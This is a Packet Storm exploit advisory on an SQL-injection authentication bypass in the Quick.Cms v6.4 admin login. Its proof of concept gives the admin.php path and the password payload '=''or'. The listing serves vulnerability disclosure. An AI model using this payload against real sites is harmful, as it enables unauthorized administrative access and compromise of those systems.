Quick CMS version 6.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
371be15379da1b62d2f4126e6db0e1ca97f1896e78e829c5940d7d7753c20932 ___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)
| Vendor Homepage: http://opensolution.org
| Software Link:
http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE: N/A
| Dork: N/A
|__________________________________________________
The vulnerability is in the login area of Quick.Cms_v6.4,
where we can enter the panel only using some parameters such as
password
__________________________________________________
Proof of Concept :
http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass:
'=''or'
__________________________________________________
Discovered By : Ashiyane Digital security Team
__________________________________________________
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed